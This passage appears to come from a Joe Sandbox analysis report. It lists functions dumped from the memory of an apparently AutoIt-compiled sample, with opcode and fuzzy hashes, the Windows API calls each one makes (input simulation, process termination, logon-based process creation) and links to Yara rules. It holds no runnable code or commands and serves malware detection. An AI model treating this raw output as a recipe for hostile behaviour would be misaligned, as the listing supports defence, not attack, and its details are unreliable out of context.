Opcode ID: 0377e6a4135211448e82b73dfa624a4cab01703051edc718d17e064b72fa18af
Instruction ID: 54e7250bf8eb66f5e8faf00aa7376a5bdf485926556a4c47ac44a77a45a04839
Opcode Fuzzy Hash: 0377e6a4135211448e82b73dfa624a4cab01703051edc718d17e064b72fa18af
Instruction Fuzzy Hash: BB41B330104701AFDB12EF25CC84FB67BE8EB55724F144679F9949B2A2C7319C4ADB61

Function 0041B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004557B0,00000000,012E61C0,?,?,004557B0,?,0041B5A8,?,?), ref: 0041B712
EnableWindow.USER32(00000000,00000000), ref: 0041B736
ShowWindow.USER32(004557B0,00000000,012E61C0,?,?,004557B0,?,0041B5A8,?,?), ref: 0041B796
ShowWindow.USER32(00000000,00000004,?,0041B5A8,?,?), ref: 0041B7A8
EnableWindow.USER32(00000000,00000001), ref: 0041B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0041B7EF

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8cca49e53f167559861d31dbe7fa10499e17983c2fffa015b8642a07f57ea2b8
Instruction ID: ea69bd5e91a865c7ea5399c56284b5dc1bae30e2683d23954f05196c5df905c5
Opcode Fuzzy Hash: 8cca49e53f167559861d31dbe7fa10499e17983c2fffa015b8642a07f57ea2b8
Instruction Fuzzy Hash: 43417334600240AFDB22CF24C599BD57BE1FF45314F1881BAE9688F6F2C735A896CB95

Function 0040709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00404E41,?,?,00000000,00000001), ref: 004070AC

Part of subcall function 004039A0: GetWindowRect.USER32(?,?), ref: 004039B3

GetDesktopWindow.USER32 ref: 004070D6
GetWindowRect.USER32(00000000), ref: 004070DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0040710F

Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC

GetCursorPos.USER32(?), ref: 0040713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00407199

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b476ea363858b1f90b9460677f42e3ffb6c172efb81f02c5d67aa11b2badf3f0
Instruction ID: b4310704e763b6e8388dedb88c641206f8c1a909fc96352da2f73cc595e8a155
Opcode Fuzzy Hash: b476ea363858b1f90b9460677f42e3ffb6c172efb81f02c5d67aa11b2badf3f0
Instruction Fuzzy Hash: 5431B672505305ABD720DF14C845F9BB7AAFF88314F00092AF595AB2D1C774E90ACB96

Function 003E8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E80C0
Part of subcall function 003E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E80CA
Part of subcall function 003E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E80D9
Part of subcall function 003E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E80E0
Part of subcall function 003E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E80F6

GetLengthSid.ADVAPI32(?,00000000,003E842F), ref: 003E88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 003E88D6
HeapAlloc.KERNEL32(00000000), ref: 003E88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 003E88F6
GetProcessHeap.KERNEL32(00000000,00000000,003E842F), ref: 003E890A
HeapFree.KERNEL32(00000000), ref: 003E8911

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: cf51fe9bab4a566d9ed626ffc7191e818ae582d992fe4f91b243838961b829ba
Instruction ID: bb97725203161b5ac2f6667536819091e3ceb520cc210bcc9ae138bcd5689857
Opcode Fuzzy Hash: cf51fe9bab4a566d9ed626ffc7191e818ae582d992fe4f91b243838961b829ba
Instruction Fuzzy Hash: D511B131901619FFDB129FA5DC09BFE7BA8EB45311F118228F849D7151CB329D05DB60

Function 003E85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003E85E2
OpenProcessToken.ADVAPI32(00000000), ref: 003E85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003E85F8
CloseHandle.KERNEL32(00000004), ref: 003E8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 003E8646

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: c59253046f27062cd6d5ce91f28f6d4bc6501a5e966ce6b746ebe65ccadcf015
Instruction ID: 479d4460f7319180ed50ae0399d171eacb61236efd97eeec77ad477479da87d2
Opcode Fuzzy Hash: c59253046f27062cd6d5ce91f28f6d4bc6501a5e966ce6b746ebe65ccadcf015
Instruction Fuzzy Hash: 05115C7250024DAFDF02CFA5DD49BDE7BA9EF48304F058164FE08A21A0C7729E65DB60

Function 003EB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003EB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 003EB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EB7CD
ReleaseDC.USER32(00000000,00000000), ref: 003EB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 003EB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 003EB7FE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5789d4ee2991eb19fb35a16cab31b209b7a6beecd4f3b91dabb4ff085dee7d1c
Instruction ID: cade32f2be2a1cdb6061859b7b670dc5659dd6b472534646e3b517ac5d9fcec0
Opcode Fuzzy Hash: 5789d4ee2991eb19fb35a16cab31b209b7a6beecd4f3b91dabb4ff085dee7d1c
Instruction Fuzzy Hash: 93018475E00219BBEF119BE69C45A9EBFB8EF48311F008075FA04A7291D6319C01CF90

Function 003B0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 003B019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 003B01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 003B01C1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: db753968343c5472feb40d9fc5be51bb151c6570d20d212388ca5d50601676a3
Instruction ID: 907b5588f13e5967f1dcc7a959c4a545a7ff8edc869fb56bf8fb5c03ed9e3441
Opcode Fuzzy Hash: db753968343c5472feb40d9fc5be51bb151c6570d20d212388ca5d50601676a3
Instruction Fuzzy Hash: 25016CB0941B597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 003F53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003F53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003F540F
GetWindowThreadProcessId.USER32(?,?), ref: 003F541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F543E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ba716e968ddf962679a238590acfb28780638a9fe650ff83199b2aad99b6428f
Instruction ID: f89c44b4f69c5a6638e4adb622ffd7e9d5ff96e712868936561c0f5bac4397a3
Opcode Fuzzy Hash: ba716e968ddf962679a238590acfb28780638a9fe650ff83199b2aad99b6428f
Instruction Fuzzy Hash: 95F01D32241558BBE7215BA29C0DEEB7A7CEBC6B11F004179FA04D1061DAA11A0686B9

Function 003F7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003F7243
EnterCriticalSection.KERNEL32(?,?,003A0EE4,?,?), ref: 003F7254
TerminateThread.KERNEL32(00000000,000001F6,?,003A0EE4,?,?), ref: 003F7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,003A0EE4,?,?), ref: 003F726E

Part of subcall function 003F6C35: CloseHandle.KERNEL32(00000000,?,003F727B,?,003A0EE4,?,?), ref: 003F6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 003F7281
LeaveCriticalSection.KERNEL32(?,?,003A0EE4,?,?), ref: 003F7288

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 57b999357958e2e695205864ad650f15645e381aeaaf3d2c7c146a8bca5943c3
Instruction ID: 5e7fb011ab7483111e25e5ca4be25470a3b3ff40bd749ff823513df0556f2de4
Opcode Fuzzy Hash: 57b999357958e2e695205864ad650f15645e381aeaaf3d2c7c146a8bca5943c3
Instruction Fuzzy Hash: 19F0E236440A02EBD7121B24ED8C9EB373AFF44312B000672F603900A0CBB71806CB54

Function 003E8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E899D
UnloadUserProfile.USERENV(?,?), ref: 003E89A9
CloseHandle.KERNEL32(?), ref: 003E89B2
CloseHandle.KERNEL32(?), ref: 003E89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 003E89C3
HeapFree.KERNEL32(00000000), ref: 003E89CA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7e850c3c1be3ac05df26fe6870d2ef8669c9c5eb93c58ba67219de126639a654
Instruction ID: a9b8f9af70b8d24bf66fe94f7cce7b56be133f13f9d96e3c6800a03b32df49f3
Opcode Fuzzy Hash: 7e850c3c1be3ac05df26fe6870d2ef8669c9c5eb93c58ba67219de126639a654
Instruction Fuzzy Hash: 5AE0C936104805FBD6011FE1EC0C985BB69FB893227108230F62581070CB326826DB54

Function 003E7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E7702
CLSIDFromProgID.OLE32(?,?,00000000,0041FB80,000000FF,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E7727
_memcmp.LIBCMT ref: 003E7748

Strings

,,B, xrefs: 003E753D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,B
API String ID: 314563124-1878338948
Opcode ID: 6a838b5c7acdfbb0c3d7d22b6f2f8a309f95c332d45935664ce167bfcb45a245
Instruction ID: f5233ccd6ada85a6d001ea356a3d82699b74ee9abb9796225ad54524ceda6edf
Opcode Fuzzy Hash: 6a838b5c7acdfbb0c3d7d22b6f2f8a309f95c332d45935664ce167bfcb45a245
Instruction Fuzzy Hash: A6813C71A00119EFCF01DFA5C984EEEB7B9FF89315F204558E505AB290DB71AE06CB60

Function 004085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00408613
CharUpperBuffW.USER32(?,?), ref: 00408722
VariantClear.OLEAUT32(?), ref: 0040889A

Part of subcall function 003F7562: VariantInit.OLEAUT32(00000000), ref: 003F75A2
Part of subcall function 003F7562: VariantCopy.OLEAUT32(00000000,?), ref: 003F75AB
Part of subcall function 003F7562: VariantClear.OLEAUT32(00000000), ref: 003F75B7

Strings

Incorrect Parameter format, xrefs: 0040864B, 0040880D
AUTOIT.ERROR, xrefs: 00408728

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 1deef8b6616dabea85f1ca8ea8fdd0ea23a16ffd350367fb2ba92bf90f189563
Instruction ID: 45c13f5cd4f39262b5b01eb4ea73eafd1dedc8f73c65fe57d1a55b71f1223d09
Opcode Fuzzy Hash: 1deef8b6616dabea85f1ca8ea8fdd0ea23a16ffd350367fb2ba92bf90f189563
Instruction Fuzzy Hash: F5919E71608301DFCB10EF24C58196BB7E4EF89714F14892EF88A9B3A1DB35E946CB52

Function 003F2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9

_memset.LIBCMT ref: 003F2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003F2C97

Strings

0, xrefs: 003F2B73

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 337ff1bb4cb952e3079c8c6126d004a1aea7159744db65afb9c975a9f9f3dfb0
Instruction ID: 80212e45651f44b7441e19c98a5cc5eb1ef7f34cfb53089ea56052235173c641
Opcode Fuzzy Hash: 337ff1bb4cb952e3079c8c6126d004a1aea7159744db65afb9c975a9f9f3dfb0
Instruction Fuzzy Hash: 1951CD71608308DED7269F28C845A7FB7E8EF89760F050A2DFA95D71A1DB74CC048B92

Function 003A3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A3277
_memmove.LIBCMT ref: 003A3310
_free.LIBCMT ref: 003A3336
_memmove.LIBCMT ref: 003A33E9

Strings

_:, xrefs: 003A3322
3c:, xrefs: 003A3225

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c:$_:
API String ID: 2620147621-3871541621
Opcode ID: 2d843d97336d75fdfba16849551bc0e2dfa67c349669d6c6b1fb80f9735af46c
Instruction ID: 5bb84d0e30d8df0b9eaea3be1764ef6b1d66a201c30a0f738f3479b919831adc
Opcode Fuzzy Hash: 2d843d97336d75fdfba16849551bc0e2dfa67c349669d6c6b1fb80f9735af46c
Instruction Fuzzy Hash: E7514A71A083418FDB2ACF29C541B6EBBE5EF8A314F05492DF99987351DB31E901CB82

Function 003A6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003A6248
_memmove.LIBCMT ref: 003A62E4
_memset.LIBCMT ref: 003A6308

Strings

3c:, xrefs: 003A62AF
ERCP, xrefs: 003A61B3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c:$ERCP
API String ID: 2532777613-911437667
Opcode ID: 8309d223287fe621b1d3648993a2cbc61fce7fcf2afc5fe2ed87c34de6214f0d
Instruction ID: f5ffa07a523b08ce848d2fd7fa5d92484aee6b49c4997fd077c032c8adcafa98
Opcode Fuzzy Hash: 8309d223287fe621b1d3648993a2cbc61fce7fcf2afc5fe2ed87c34de6214f0d
Instruction Fuzzy Hash: 3551AF70900705DBDB2ACF65C8827ABB7F8EF45314F24896EE54ACB690E770EA40CB50

Function 003F2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003F27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 003F2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00455890,00000000), ref: 003F286B

Strings

0, xrefs: 003F27B5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d62e7f1881652c0c62bc3e41604c441fc7fbd1cd9176adcced4ecc48521be657
Instruction ID: 48724d1173b461deab560cd03d5aad914543d32778652fd3367b3cb1ab903cf1
Opcode Fuzzy Hash: d62e7f1881652c0c62bc3e41604c441fc7fbd1cd9176adcced4ecc48521be657
Instruction Fuzzy Hash: 7541C070204305DFDB22DF25C845B6BBBE8EF85354F05492DFA659B292D730A805CB52

Function 0040D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0040D7C5

Part of subcall function 0039784B: _memmove.LIBCMT ref: 00397899

Strings

none, xrefs: 0040D8A0
winapi, xrefs: 0040D836
cdecl, xrefs: 0040D81C
stdcall, xrefs: 0040D847

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 9fcb496c80e28e90b7140f219e6954c8683e47d99455ebac28ffd4cc43ecd2ce
Instruction ID: 8fdeddc24b951754cc2d2e9cdc4e8243f433b674ec24bacfa8a337f9a9358158
